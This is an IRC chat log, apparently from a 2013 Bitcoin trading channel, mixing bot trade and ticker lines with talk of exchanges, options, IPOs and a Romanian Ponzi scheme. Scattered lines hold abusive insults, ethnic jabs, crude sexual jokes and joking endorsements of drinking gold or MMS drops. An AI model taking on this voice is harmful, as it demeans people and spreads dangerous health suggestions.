within the first few minutes Mar 27 22:20:17 lol Mar 27 22:22:12 this IPO is actually not a joke, whaddaya know Mar 27 22:26:04 [BTCTC] [BTC-BOND] 2 @ 0.009994 = 0.02 BTC [+] Mar 27 22:28:09 [BTCTC] [RSM] 1 @ 0.00349 BTC [-] Mar 27 22:28:37 [BTCTC] [RSM] 233 @ 0.0035 = 0.8155 BTC [+] Mar 27 22:30:48 [BTCTC] [ASICMINER-PT] 13 @ 0.672002 = 8.736 BTC [-] Mar 27 22:39:44 ;;ticker Mar 27 22:39:45 BTCUSD ticker | Best bid: 88.20004, Best ask: 88.48899, Bid-ask spread: 0.28895, Last trade: 88.48899, 24 hour volume: 72845.53914176, 24 hour low: 77.13000, 24 hour high: 89.24500, 24 hour vwap: 84.05146 Mar 27 22:39:49 http://www.reddit.com/r/Bitcoin/comments/1b4l6d/bitcoin_red_pill/c93iswr Mar 27 22:39:56 ^^ indicates top Mar 27 22:40:32 huh?? Mar 27 22:42:37 Haha...a financial system without fraud. That's going great so far. Mar 27 22:42:38 financial system without fraud and corruption. nailed it. Mar 27 22:42:44 [BTCTC] [RSM] 1 @ 0.004 BTC [+] Mar 27 22:43:09 [BTCTC] [RSM] 1 @ 0.004 BTC [+] Mar 27 22:44:14 who runs bitfunder? Mar 27 22:44:14 [MPEX] [S.DICE] 7000 @ 0.00399999 = 27.9999 BTC [+] Mar 27 22:44:15 hooo Mar 27 22:44:16 funny Mar 27 22:44:26 Ukto: Mar 27 22:44:31 ah, that's right, thx Mar 27 22:45:09 :) Mar 27 22:47:45 coinbr is donw jurov? Mar 27 22:48:01 nope, back up, was getting 503 for a minute Mar 27 22:48:47 smickles: you could say the system doesn't have fraud, though fraudulent people use it Mar 27 22:48:52 Anyone want some P750T? Mar 27 22:49:13 no one would say the dollar is fraudulent because bernie madoff took dollars Mar 27 22:49:22 depends on the price, smickles Mar 27 22:49:24 its fraudulent because it is artificially inflated Mar 27 22:49:24 :) Mar 27 22:49:25 MJR_: this basically reminded me of the falkvinge all in Mar 27 22:49:41 deadweasel: ~.019 currently Mar 27 22:50:06 not too bad Mar 27 22:50:50 i assume you meant .19 Mar 27 22:52:51 nah hement .019 Mar 27 22:52:56 thats actually a good price Mar 27 22:53:21 oh i missed the P Mar 27 22:53:29 my bad Mar 27 22:53:39 [MPEX] [O.BTCUSD.P750T] 30 @ 0.01889435 = 0.5668 BTC [-] Mar 27 22:53:58 :D Mar 27 22:56:15 oh yeah, I missed the P too. jesus, I'm gonna get eaten alive if I start trading options. balls. Mar 27 22:57:00 [HAVELOCK] [SDICE] 10 @ 0.401 = 4.01 BTC [+] Mar 27 22:59:00 [HAVELOCK] [VTX] 1 @ 0.56 BTC [-] Mar 27 22:59:02 anyone know why mtgoxlive.com hasnt worked in ages? Mar 27 22:59:18 i didn't notice Mar 27 22:59:23 now that bitcoinity is back Mar 27 22:59:24 who cares Mar 27 22:59:36 hehe true i've been using bitcoinity lately too Mar 27 22:59:41 top i had it working yesterday Mar 27 22:59:41 or http://markets.blockchain.info Mar 27 22:59:44 but sometimes i like the mtgoxlive chart just to have open Mar 27 22:59:51 but i dont like it anymore either Mar 27 22:59:59 [HAVELOCK] [VTX] 1 @ 0.55 BTC [-] Mar 27 23:00:04 I cant edit my system path because FUCKEN SKURITY Mar 27 23:00:06 it takes WAY too much CPU Mar 27 23:00:19 must resist urge to choke these fucks Mar 27 23:00:38 sooo... what's new Mar 27 23:00:46 lol Mar 27 23:01:33 ;;ticker Mar 27 23:01:35 BTCUSD ticker | Best bid: 87.50108, Best ask: 88.00000, Bid-ask spread: 0.49892, Last trade: 88.00000, 24 hour volume: 70885.65101480, 24 hour low: 77.90000, 24 hour high: 89.24500, 24 hour vwap: 84.33496 Mar 27 23:02:01 http://www.telegraph.co.uk/technology/internet-security/9957063/Web-slows-under-biggest-attack-ever.html Mar 27 23:02:05 apparently everyone's being probed. Mar 27 23:02:05 ya Mar 27 23:02:18 blockchain.info is reporting 2333 unconfirmed transactions, not sure if that's accurate Mar 27 23:02:54 I finally decided tiberius is an idiot Mar 27 23:03:13 ooooooo Mar 27 23:03:17 rally Mar 27 23:03:17 yay! Mar 27 23:03:35 TomServo kinda Mar 27 23:03:49 Bugpowder: why did it take this long? did i miss something? Mar 27 23:03:49 there's been a pool of 2-5k waiting txs since about 3 months ago Mar 27 23:03:55 Oh? Mar 27 23:04:13 lol, also its funny Mar 27 23:04:20 once everyone moves to bitcoinity Mar 27 23:04:26 it starts slowing down and fucking up Mar 27 23:04:35 i think the fact that blockchain info has a proxy too now Mar 27 23:04:37 that would be mpex hosting ;) Mar 27 23:04:54 nah, its just that everyone slammed clarkmoody Mar 27 23:04:57 so it stopped working Mar 27 23:05:05 then moved to mtgoxlive so it stopped working Mar 27 23:05:25 and now bitcoinity is really slow and the bottom chart disappears and needs to be reloaded Mar 27 23:06:13 Bugpowder omg hater. Mar 27 23:06:37 he know some stuff Mar 27 23:06:43 < mircea_popescu> there's been a pool of 2-5k waiting txs since about 3 months ago << that's a bit misleading, it's not like there are unconfirmed txns that have been waiting that long Mar 27 23:06:46 he has a general framework and understanding Mar 27 23:06:49 tbh the anti spam industry is full of retarded fuckwits that deserve to die Mar 27 23:07:07 but he is half blind Mar 27 23:07:16 smickles a no, i just mean there's a sort of pool for the cheapskates who won't add a fee Mar 27 23:07:18 also one of the biggest douches I have come across Mar 27 23:07:20 they are mostly hillbillies with no operational experience Mar 27 23:07:22 maybe just the way i read it tho Mar 27 23:07:27 what's the avg for a nofee tx to make it to a block by now, 12 hours ? Mar 27 23:07:37 dub totally. Mar 27 23:07:49 dub that they're clueless/stupid is not even the main problem. they're crooked. Mar 27 23:08:04 as in, selling access to spammers. they're not the antispam industry, they're the spam apportioning industry. Mar 27 23:08:57 but he is half blind << i still think he's trying the "i am king of the world you must play my little debate games on my terms for me to understand the world or else it won't be understood by one such as me to its detriment" sillyness Mar 27 23:09:00 i blame his mother. Mar 27 23:09:27 quite a mayhem ensued on #bitfunder, Ukto dropped another IPO Mar 27 23:09:35 https://bitfunder.com/asset/btcQuick Mar 27 23:09:40 dropped what's that ? Mar 27 23:09:43 like canned it ? Mar 27 23:09:46 launched Mar 27 23:09:46 _I_ didnt drop it.. Mar 27 23:09:48 btcQuick did Mar 27 23:09:51 right? Mar 27 23:09:52 -_- Mar 27 23:09:55 put it in place without pre announcement Mar 27 23:10:03 for all I know..with another issuer going nuts wanting to launch Mar 27 23:10:08 there might even be another today Mar 27 23:10:09 or tomorrow Mar 27 23:10:18 and he hasnt made any secret of it Mar 27 23:10:29 lol, so i will make another 20% on it? Mar 27 23:10:33 lol Mar 27 23:10:35 isnt announcement up to the issuer? Mar 27 23:10:39 what's these things even do ? Mar 27 23:10:48 they take credit cards Mar 27 23:10:49 (i just sold call option to namworld expiring today) Mar 27 23:10:53 to buy btc Mar 27 23:10:57 quickbtc is bitcoin for google wallet Mar 27 23:11:10 they have an excellent history/rep :) Mar 27 23:11:12 how is bitcoin for google wallet supposed to make money ? Mar 27 23:11:18 I use my google wallet all the fucking time Mar 27 23:11:25 you do ? Mar 27 23:11:29 no Mar 27 23:11:30 i thought google wallet is like wave. Mar 27 23:11:34 mircea_popescu: he sells btc using google checkout Mar 27 23:11:36 that is Mar 27 23:11:38 apparently they defeated a huge chargeback attempt Mar 27 23:11:55 so i get email Mar 27 23:11:57 they do a special membership thing, to get ppl identified Mar 27 23:11:59 "Mr. M. Barlow 6:46 am ! BUSINESS." Mar 27 23:12:05 mircea_popescu: i get email too :D Mar 27 23:12:06 when are people going to get that bitcoin is bad for microtransactions Mar 27 23:12:11 smickles: LOL Mar 27 23:12:23 smickles yours is prolly better. Mar 27 23:12:33 the container of shoes vs. the shoe analogy is good Mar 27 23:12:50 Bugpowder never, because i said it, and i'm a sociopathic arrogant evil guy. Mar 27 23:13:00 [HAVELOCK] [SDICE] 1 @ 0.439 BTC [+] Mar 27 23:13:31 I'm still waiting 3 weeks for a response to my inquires about where my earphones are from the bitcoinstore Mar 27 23:13:34 4.4BTC Mar 27 23:13:36 gone Mar 27 23:13:39 damn Mar 27 23:13:47 o wait, my email gets better. "We noticed that you haven't signed in to your eBay account for quite some time, and we'd like to invite you back to buy and sell again. eBay's a great place to buy what you want, and sell what you have." Mar 27 23:13:58 10% fees now on ebay Mar 27 23:14:02 insane Mar 27 23:14:09 not like... "hey, we notice we suck because we're douches" but "we notice we're so incredibly great" Mar 27 23:15:00 [HAVELOCK] [SDICE] 1 @ 0.439 BTC [+] Mar 27 23:15:56 Bugpowder: 20%+ on ebay depending on category Mar 27 23:15:59 plus 3% to pp Mar 27 23:17:04 ridiculous. Mar 27 23:17:13 when do we get a bitcoin ebay killer already ? Mar 27 23:17:18 that'd be something worth ipoing. Mar 27 23:23:09 "MPEx will never list anything which mircea is not a majority shareholder" Mar 27 23:23:12 :D Mar 27 23:23:35 ;;everify freenode:#bitcoin-otc:5f2e6c77f8ae4bf16888289715057650abb8d69bb81c889f36665505 Mar 27 23:23:36 You are now authenticated for user jurov with key 677ABD62D0AEE7D7 Mar 27 23:23:41 from special T Mar 27 23:24:23 [MPEX] [S.DICE] 26 @ 0.00399999 = 0.104 BTC [+] Mar 27 23:24:29 heh that's bull. sure it will. Mar 27 23:24:51 wait, what ?! i'm not a majority shareholder in most Mar 27 23:24:56 but we can't believe you because you're romainian Mar 27 23:25:07 a ok Mar 27 23:25:24 so basically mpex makes more dough than all the exchanges combined but we can't believe this cause i'm evil. Mar 27 23:25:29 works for me srsly. Mar 27 23:25:47 and you live in the good part of romainia, so you're an extra good scammer Mar 27 23:25:58 hahaha Mar 27 23:26:33 i'm simplifying what he said, but the spirit is there, imo Mar 27 23:26:37 yes. logic, it comes in bottles now. Mar 27 23:27:07 but it's funny you know, the assumptions people make who are ignorant of history. Mar 27 23:27:13 mircea_popescu: no cryprian atm bombs near you lately ? Mar 27 23:27:21 mpoe was here before bitcoinica. what's that matter tho if you're born march 2013 Mar 27 23:27:43 Ukto romania is actually in such a good position i prefer keeping lei to euro. Mar 27 23:27:55 ahhh Mar 27 23:28:01 i just ment angry mob wise Mar 27 23:28:08 not neccesarily funds :) Mar 27 23:28:09 not rly. not much cause to get angry rly. Mar 27 23:28:24 they blew up your atm, tho Mar 27 23:28:24 i didnt think there would be many angry cyprians Mar 27 23:28:49 see, here's a thing : romania is ~20mn people and holds ~120 tons of gold. Mar 27 23:29:01 funny sorta-similar-bank-name's atm Mar 27 23:29:10 non-germany yurp is like 300mn people holds what, 1000 tons ? Mar 27 23:29:15 smickles ya lol Mar 27 23:29:29 dont forget the ETFs! Mar 27 23:30:20 Bugpowder no this is actual gold. romania is lucky in that the natl bank governor is literally the brightest mind in the field atm. Mar 27 23:30:44 think greenspan, except he gets a romanian deal, whereby he owns that chair and ocasionally gets to be the prime minister. Mar 27 23:30:44 mircea_popescu: are you planning to coopt him? Mar 27 23:30:48 dude owns the joint. Mar 27 23:30:49 Santelli is not happy with gold anymore Mar 27 23:30:50 !last c750t Mar 27 23:30:50 I don't give a shit who saw what and who did what or who did who. Mar 27 23:31:04 !last o.btcusd.c750t Mar 27 23:31:04 It's so strange that you don't remember any of your poetry. Mar 27 23:31:07 jurov no. we can't coopt each other sadly, but honestly he's smart enough. Mar 27 23:31:10 @.@ Mar 27 23:31:17 $vwap oix Mar 27 23:31:18 smickles: ^OIX 1 day: no data 7 day: average: 77.33064121 high: 81.26895624 low: 48.45744947 volume: 71439 btc: 8379.0230226 30 day: no data Mar 27 23:31:27 "securitization of gold has killed it as an ayn rand end-game currency" Mar 27 23:31:37 assbot> I don't give a shit who saw what and who did what or who did who. < I like that assbot Mar 27 23:31:44 ya but on the other hand... securitization of gold is unavoidable. Mar 27 23:31:57 gold has serious issues that don't go away just cause we'd wish them to. Mar 27 23:32:13 "if the internet felt a bit more sluggish for you over the last few days in Europe, this may be part of the reason why." Mar 27 23:32:21 well derp Mar 27 23:32:24 lol Mar 27 23:32:30 dub you broke the interwebers ? Mar 27 23:32:31 reaching europ from th einternet has always been sluggish Mar 27 23:32:38 gold issues will be overcome when we get teleportation tech :D Mar 27 23:32:54 jurov and fingers become silky smooth. Mar 27 23:32:58 *non-destructive teleportation tech Mar 27 23:33:56 I recommend drinking aqueous gold so that you can incorporate it within your essential bodily tissues Mar 27 23:34:05 eh don't do that. Mar 27 23:34:14 and get killed to harvest it, eya? Mar 27 23:34:18 some idiot is going to go "brain surgeon researcher guy recommended this toxioc stupid process" Mar 27 23:34:47 oh that's right, Bugpowder you have a position of responsibility Mar 27 23:34:51 ಠ_ಠ Mar 27 23:35:08 http://www.google.com/imgres?imgurl=http://clickholistic.files.wordpress.com/2008/09/abc_blue_man_080731_mn.jpg&imgrefurl=http://clickholistic.wordpress.com/tag/colloidal-silver-poisoning/&h=240&w=320&sz=36&tbnid=HzKWTCR-YgvOCM:&tbnh=90&tbnw=120&zoom=1&usg=__ycCjQN_E6ccnuMvacF9N3UmwywM=&docid=tLtWeQ4peOSVDM&hl=en&sa=X&ei=9mVTUaypBNTH4AOipICoBg&sqi=2&ved=0CEgQ9QEwBA&dur=320 Mar 27 23:35:27 dero Mar 27 23:35:28 no thanks. i prefer MMS drops. Mar 27 23:35:28 derp Mar 27 23:35:42 lmao can't even spell derp Mar 27 23:35:43 do you turn gold if you drink colloidal gold? Mar 27 23:36:00 ;;ticker Mar 27 23:36:02 BTCUSD ticker | Best bid: 87.40003, Best ask: 87.49999, Bid-ask spread: 0.09996, Last trade: 87.40001, 24 hour volume: 70763.99455011, 24 hour low: 78.02000, 24 hour high: 89.24500, 24 hour vwap: 84.48762 Mar 27 23:37:16 i think there's cutanous inglobation and also the potential for some benign visceral tumours Mar 27 23:37:22 i don't recall how it's called tho. Mar 27 23:37:47 ;;ticker Mar 27 23:37:48 BTCUSD ticker | Best bid: 87.40004, Best ask: 87.50000, Bid-ask spread: 0.09996, Last trade: 87.50000, 24 hour volume: 70598.11766889, 24 hour low: 78.02000, 24 hour high: 89.24500, 24 hour vwap: 84.50209 Mar 27 23:38:48 Bugpowder, better get implant with privkeys Mar 27 23:39:08 won't trip metal detectors Mar 27 23:39:29 and available at nearest vet :) Mar 27 23:39:46 i kinda wonder how long before privkey tattoos Mar 27 23:40:00 pubkey, no? Mar 27 23:40:08 yeah Mar 27 23:40:17 privkey has to be on some private location Mar 27 23:40:20 yah Mar 27 23:40:22 privkey I wouldn't want exposed Mar 27 23:40:24 taint Mar 27 23:40:26 internal Mar 27 23:40:49 Private parts eh? Mar 27 23:40:59 well... on pubis Mar 27 23:41:02 Suiting place for a private key. Mar 27 23:41:03 need to shave to read. Mar 27 23:41:16 Europeans at a real advantage here Mar 27 23:41:31 how so ? Mar 27 23:41:52 really all 'muricans are shaved and cut? Mar 27 23:42:05 not all Mar 27 23:42:07 most are cut Mar 27 23:42:07 or because of tsa? Mar 27 23:42:43 changing now that some states no longer pay for the procedure Mar 27 23:44:25 so basically... upon news that bitcoinity is mpex approved everyone hammers site into the ground. Mar 27 23:44:28 evil. Mar 27 23:45:29 yes? did not notice anything Mar 27 23:45:33 I'm pretty sure the blockchain.info inclusion of it probably did that Mar 27 23:45:51 http://markets.blockchain.info/ Mar 27 23:46:11 pizzaman1337 prolly. Mar 27 23:47:32 mp, can i get a deposit cleared Mar 27 23:47:32 http://blog.cloudflare.com/the-ddos-that-almost-broke-the-internet Mar 27 23:47:33 heeey! Mar 27 23:47:39 we got a bid wall Mar 27 23:47:43 more info on the 300gbit ddos Mar 27 23:49:30 yeah. deposits flushed. Mar 27 23:49:47 jcpham lol cloudflare trying to parlay themselves into any ddos discussion. Mar 27 23:50:06 its pretty lulzy Mar 27 23:50:12 [BTCTC] [BASIC-MINING] 3 @ 0.34999 = 1.05 BTC [+] Mar 27 23:50:48 Thank you Mar 27 23:51:29 Did they blame juniper again? heh Mar 27 23:54:00 these all-marketing corps will end up driving us into the ground. Mar 27 23:54:11 already the all-marketing banks fucked up this generation's life. Mar 27 23:55:29 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Mar 27 23:55:31 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Mar 28 00:02:19 ;;asks 89.90 Mar 28 00:02:22 There are currently 1707.8129 bitcoins offered at or under 89.9 USD, worth 152553.745975 USD in total. | Data vintage: 0.0015 seconds Mar 28 00:03:14 why isn't there a futures contract on btcusd? Mar 28 00:03:17 @ mpex Mar 28 00:03:55 taub what function would it serve that options don't cover ? Mar 28 00:04:24 https://bitcointalk.org/index.php?topic=159560.0 < just one instrument and easier to see the price directly Mar 28 00:04:28 or new scamsic ? Mar 28 00:04:55 only 80ghz? Mar 28 00:04:56 taub the thing is i don't like making futures which don;t include delivery. in my eyes unsettled future pretty much = scam. Mar 28 00:05:10 i can get 40 on cpu mining litecoins Mar 28 00:05:10 but if you know someone who can do the delivery part i'd list it. Mar 28 00:05:18 like, CFDs? Mar 28 00:05:29 you can do cash settlements Mar 28 00:05:44 http://www.cmegroup.com/rulebook/CME/III/250/270/270.pdf Mar 28 00:05:48 pizzaman1337 the problem is that if the buyer of the underlying future does not have the "i'll take delivery" recourse Mar 28 00:05:50 like this Mar 28 00:05:52 price is wide open to manipulation. Mar 28 00:06:04 and i don't want to introduce more garbage in bitcoin finance, idiots do enough fo that. Mar 28 00:06:09 im trying to create sense. Mar 28 00:06:29 new daily asic scams Mar 28 00:06:34 I see Mar 28 00:06:39 taub what happens if at settlement time "gold is worth 1200 usd" ? Mar 28 00:07:00 this was the problem with so-called futures like the icbit ones, have you seen that article back then ? Mar 28 00:07:08 no Mar 28 00:07:22 http://trilema.com/2012/icbitse-the-bucket-shop/ Mar 28 00:07:31 i quit bitcoin for 2 years after i found out THE LAW wouldn't let me run my fiat exchange Mar 28 00:07:49 you would have been better off to quit your country. Mar 28 00:07:58 sure would Mar 28 00:09:16 ;;ticker Mar 28 00:09:17 BTCUSD ticker | Best bid: 88.00642, Best ask: 88.48999, Bid-ask spread: 0.48357, Last trade: 88.49000, 24 hour volume: 70736.16864776, 24 hour low: 78.02000, 24 hour high: 89.24500, 24 hour vwap: 84.54575 Mar 28 00:09:28 ;;bc,24hprc Mar 28 00:09:30 84.68 Mar 28 00:09:42 ;;( Mar 28 00:09:42 Error: "(" is not a valid command. Mar 28 00:09:45 range Mar 28 00:09:58 ;;calc (84.68 - 75)/84.68 Mar 28 00:10:01 0.11431270666 Mar 28 00:10:02 where will it break out to?! Mar 28 00:10:43 0.11431 - 0.065 Mar 28 00:10:53 ;;calc 0.11431 - 0.065 Mar 28 00:10:54 0.04931 Mar 28 00:11:00 woooooot Mar 28 00:11:05 haha did you turn a profit ? Mar 28 00:11:17 so that means you made .049 for each option you purchased? Mar 28 00:11:22 you might wanna wait before youe excercise... Mar 28 00:11:49 doobey oooby oooby Mar 28 00:11:51 how many did you buy? Mar 28 00:11:52 mircea_popescu: i followed bugpowders bet as an experiment Mar 28 00:12:01 congrats Mar 28 00:12:20 only 4 but its like 200% bugpowder probably has made at least 100 grand Mar 28 00:12:28 100%* Mar 28 00:12:30 cool beanz. Mar 28 00:12:30 ;;asks 89.94 Mar 28 00:12:33 There are currently 1684.1113 bitcoins offered at or under 89.94 USD, worth 150483.030546 USD in total. | Data vintage: 0.0017 seconds Mar 28 00:12:34 heh Mar 28 00:12:41 you people need to stop making money off the fake mpex volume and shit. Mar 28 00:12:51 Bugpowder is rich! congrats to him Mar 28 00:12:58 dayum Mar 28 00:13:04 nice trade Mar 28 00:13:06 I'd like to thank the people that made this day possible Mar 28 00:13:11 the trade is not over yet Mar 28 00:13:17 Bugpowder should stop dicking around and start a 500mn dolla fund to invest in bitcoin crap. Mar 28 00:13:28 but no, he's buying cars and decerebrating mice. fucking waste. Mar 28 00:13:34 If I don't land this job Mar 28 00:13:34 lol Mar 28 00:13:37 I just might Mar 28 00:13:47 Bugpowder let me tell you a story. Mar 28 00:14:01 yes daddy Mar 28 00:14:05 so, romania is a fucking backwater. the people here were mentally retarded as recently as 20 years ago. Mar 28 00:14:05 bug, you should do start that EBAY killer, then you can remove mouse cerebellums Mar 28 00:14:20 and i do mean this. of a 50k strong police force you couldn't find ten cops who knew what pot smelled like. Mar 28 00:14:34 LOL Mar 28 00:14:38 let that sink in for a minute, half the arab doctors schooled in cluj, cops have no idea what pot is. Mar 28 00:14:50 maybe they have better things to do than hunt kids with drugs Mar 28 00:15:05 pretty much communist stuff, this is how it ends up. people just sheeple around, govt provides, everyone's clueless like a 16 yo priss. Mar 28 00:15:16 sounds like china Mar 28 00:15:19 so, a year after the revolution someone started a ponzi. Mar 28 00:15:23 it was called caritas Mar 28 00:15:25 heheh Mar 28 00:15:28 it took over the motherfucking country. Mar 28 00:15:28 ohhh yesss Mar 28 00:15:32 this is the backdrop. Mar 28 00:15:50 https://www.youtube.com/watch?v=9K5cEOKXPGA romanian police :) Mar 28 00:15:55 now this one guy, a carpenter, he got in early and let it ride. Mar 28 00:16:15 one friday he was scheduled to go pick up his huge loot. i mean packets of loot. Mar 28 00:16:35 he went to his boss at where he worked to get an coupla hours off before lunch to get his loot. Mar 28 00:16:39 boss wouldn't let it Mar 28 00:16:41 thanks pizzaman Mar 28 00:16:41 SO HE DIDNT GO. Mar 28 00:16:45 saturday it failed. Mar 28 00:16:55 the guy's loot was ~5000 years' worth of his salary. Mar 28 00:16:56 taub: bitch had it coming Mar 28 00:17:09 ohhhh Mar 28 00:17:10 ... Mar 28 00:17:11 sheeeeit Mar 28 00:17:17 he would have been paid too Mar 28 00:17:20 they paid all through friday night. Mar 28 00:17:25 >.> Mar 28 00:17:31 moral of the story is : Mar 28 00:17:35 listen to your boss. Mar 28 00:17:40 hehe Mar 28 00:17:43 but understand your boss is whoever is cutting the checks. Mar 28 00:17:46 * Submitting withdrawal request * Mar 28 00:17:49 NOT whoever talks loudest Mar 28 00:18:05 jk Mar 28 00:18:33 I think it would be easier to fund a lab with bitcoin investments than to get NIH grant money Mar 28 00:19:05 by now prolly. Mar 28 00:19:16 just say it makes asics out of mice brainz Mar 28 00:19:22 lol Mar 28 00:19:25 heheh Mar 28 00:19:27 asic mouse wheels Mar 28 00:19:36 SHA-shaped labyrinth Mar 28 00:19:40 O watts! 35+ mice per hour Mar 28 00:19:48 lol Mar 28 00:19:50 just pitch the dead ones out the window Mar 28 00:20:00 no they are trade-ins Mar 28 00:20:02 make a cat petshop as a side business Mar 28 00:20:04 own reddit. Mar 28 00:20:07 marketing. Mar 28 00:20:55 i dont understand why Satoshi made the weakness of 50% atack.. it would feel better if the threshold was at 80-90% Mar 28 00:21:03 ^^ just peeked into -otc Mar 28 00:21:07 lol! Mar 28 00:21:11 stupid satoshi Mar 28 00:21:13 ... Mar 28 00:21:24 jurov ahahaha o gawd. Mar 28 00:21:24 argh... I could make a real bitcoin fund Mar 28 00:21:32 satoshi could do ANYTHING Mar 28 00:21:34 forealz. Mar 28 00:21:40 Could probably get 10M seed Mar 28 00:21:44 pretty easy Mar 28 00:22:00 then do it. Mar 28 00:22:08 would need to be full time Mar 28 00:22:15 make sure you don't break any laws, don't lie to anybody, and fucking do something useful with your time Mar 28 00:22:18 I'm on a track baby Mar 28 00:22:54 mircea_popescu: best life advice evar. Mar 28 00:23:10 and I swear I never thought I'd say that Mar 28 00:24:11 thats terrible advice for business Mar 28 00:24:12 Bugpowder: if you need any help, i'd be honored (for .5btc per hr.) :D Mar 28 00:24:21 bitcoin just didn't seem like it would have the market cap to make it worth it, until the last 2-3 months Mar 28 00:24:26 life advice, not business. Mar 28 00:24:39 ;;seen smickles Mar 28 00:24:39 smickles was last seen in #bitcoin-assets 12 minutes and 50 seconds ago: doobey oooby oooby Mar 28 00:24:56 Well.... I'll know in 3 weeks Mar 28 00:25:03 smickles: will you be able to get the account statement stuff in a bit? Mar 28 00:25:22 if Gates or Jobs followed those rules they would be in the gutter Mar 28 00:25:38 thestrin1puller: yes shortly, Mar 28 00:26:43 It attracted millions of depositors from all over the country who invested more than a trillion old lei (between one and five billion USD) before it finally went bankrupt on 14 August 1994 Mar 28 00:26:55 jesus god. it ran for two years and yes, billion usd. Mar 28 00:27:07 smaller than pirate Mar 28 00:27:14 in a few months Mar 28 00:27:16 this is why we don't motherfucking want polite people, this is what we don't want sfw and this is why we don't want governments. Mar 28 00:28:36 time for another ponzi plot Mar 28 00:28:44 see, this is why I want to provide a nice big investment opportunity to bitcoin Mar 28 00:28:51 just so people like mircea_popescu can stfu about "governments" Mar 28 00:32:32 http://i.imgur.com/sm8Tb6R.png Mar 28 00:33:06 PONZI Mar 28 00:33:10 Bugpowder pretty soon you'll need a totally new log base invented just for you Mar 28 00:33:15 we'll call it the B number. Mar 28 00:33:20 lol Mar 28 00:33:21 something like eleventy Mar 28 00:33:49 see, I'm not doing that good in terms of total BTC multiplied Mar 28 00:33:56 only 2.35x Mar 28 00:33:58 ya, just doubled it Mar 28 00:34:03 totally shit i agree. Mar 28 00:34:08 i regularly double my gold bars in my safe Mar 28 00:34:18 i stick them in a girl's vagina, end up with two girls. Mar 28 00:34:20 i mean two bars. Mar 28 00:35:46 heh Mar 28 00:36:06 also, vag very useful for teleportation Mar 28 00:36:15 thestrin1puller: sent :) Mar 28 00:36:38 thats totally true..i've found myself comming and going quite a bit in vag Mar 28 00:37:37 errr... i mixed that up. for teleportation, ass is used Mar 28 00:37:42 aka asspull Mar 28 00:45:09 deadweasel dub it's great business advice. Mar 28 00:45:47 i still think you could add cash settlement futures Mar 28 00:46:00 2 people enter a contract buy/hold Mar 28 00:46:06 buy or sell i mean Mar 28 00:46:24 at the end one pays the difference to the other over the settlement price Mar 28 00:46:34 which you can pull like you do now from 24h price or some other source Mar 28 00:47:10 taub it'd be a side bet. Mar 28 00:47:18 smickles: thanks mang! greatly appreciated Mar 28 00:47:37 there are lots of futures contracts that are settled in cash Mar 28 00:48:06 [MPEX] [S.DICE] 1950 @ 0.00395302 = 7.7084 BTC [-] Mar 28 00:48:09 [MPEX] [S.DICE] 2989 @ 0.0037 = 11.0593 BTC [-] Mar 28 00:48:11 [MPEX] [S.DICE] 5379 @ 0.0036 = 19.3644 BTC [-] Mar 28 00:48:12 [MPEX] [S.DICE] 2000 @ 0.0033 = 6.6 BTC [-] Mar 28 00:48:16 [MPEX] [S.DICE] 5034 @ 0.003198 = 16.0987 BTC [-] Mar 28 00:48:23 [MPEX] [S.DICE] 100 @ 0.00310002 = 0.31 BTC [-] Mar 28 00:48:25 [MPEX] [S.DICE] 12548 @ 0.00310001 = 38.8989 BTC [-] Mar 28 00:48:30 [BTCTC] [PAJKA.BOND] 1 @ 0.1069 BTC [+] Mar 28 00:48:33 poor S.DICE Mar 28 00:48:43 ouch Mar 28 00:48:55 holding btc more profitable Mar 28 00:49:20 hey, so it's now under ipo prices. Mar 28 00:51:06 whats the time the bot creates new batches of options? Mar 28 00:51:52 !ticker S.MPOE Mar 28 00:51:52 You know, I've had it up to here with this Indian malarkey. Mar 28 00:51:55 !ticker m S.MPOE Mar 28 00:51:56 [MPEX:S.MPOE] 1D: 0.00060001 / 0.00061926 / 0.00063879 (140012 shares, 86.70 BTC), 7D: 0.00060001 / 0.00068066 / 0.00077402 (2007346 shares, 1,366.33 BTC), 30D: 0.00060001 / 0.00073633 / 0.00078628 (16817351 shares, 12,383.12 BTC) Mar 28 00:52:00 taub it was never specified. Mar 28 00:52:08 it sorta does every so often Mar 28 00:52:29 just did it nwo Mar 28 00:52:30 what's up with S.DICE? Why is it going so low? Mar 28 00:52:32 now~ Mar 28 00:52:59 no it didnt, sorry Mar 28 00:53:09 operator asshatery Mar 28 00:53:15 in short Mar 28 00:53:22 damientrog possibly cause this will be a low div month Mar 28 00:53:28 https://bitcointalk.org/index.php?topic=159734.0 < this guy has an interesting idea. Mar 28 00:53:40 anyone here want to make an open-source bitcoin gambling platform ? Mar 28 00:53:46 well the yield is already quite high Mar 28 00:54:03 [BTCTC] [ASICMINER-PT] 1 @ 0.711 BTC [+] Mar 28 00:54:05 [BTCTC] [ASICMINER-PT] 1 @ 0.71 BTC [-] Mar 28 00:54:12 i dont like gambling Mar 28 00:54:30 damientrog it had some crazy months so people came to expect it i guess Mar 28 00:54:39 I guess Mar 28 00:55:11 $depth s.dice Mar 28 00:55:13 mircea_popescu: S.DICE Bids: ['1025 @ 0.00310001', '805000 @ 0.0031', '100 @ 0.00100121', '3000 @ 0.00100002', '7500 @ 0.00100001'] Mar 28 00:55:14 mircea_popescu: Asks: ['53154 @ 0.00399999', '2084 @ 0.00429257', '3815 @ 0.00448', '9896 @ 0.00475', '5248 @ 0.00479999'] Mar 28 00:55:18 i wrote something like betfair in perl Mar 28 00:55:36 [BTCTC] [GSDPT] 15 @ 0.00438 = 0.0657 BTC [+] Mar 28 00:55:39 bitcoinity say all time high 89.5 Mar 28 00:55:39 taub why aren't you running it ? Mar 28 00:55:50 betting is amoral :) Mar 28 00:55:54 immoral Mar 28 00:55:57 why write it then Mar 28 00:56:20 little rally going Mar 28 00:56:24 ;;asks 90 Mar 28 00:56:27 just a little. Mar 28 00:56:31 There are currently 1998.9507 bitcoins offered at or under 90.0 USD, worth 179742.368423 USD in total. | Data vintage: 0.0018 seconds Mar 28 00:56:33 after this range Mar 28 00:56:39 dont be surprised to se a $3 jump Mar 28 00:56:44 yep Mar 28 00:57:59 [HAVELOCK] [SDICE] 3 @ 0.40011 = 1.2003 BTC [-] Mar 28 00:58:02 [HAVELOCK] [SDICE] 4 @ 0.4001 = 1.6004 BTC [-] Mar 28 00:58:02 [HAVELOCK] [SDICE] 12 @ 0.39804 = 4.7765 BTC [-] Mar 28 00:58:03 that was before i had a religious experience mircea_popescu Mar 28 00:58:23 how else could i define morality Mar 28 00:58:36 lol k Mar 28 00:58:58 man Mar 28 00:59:37 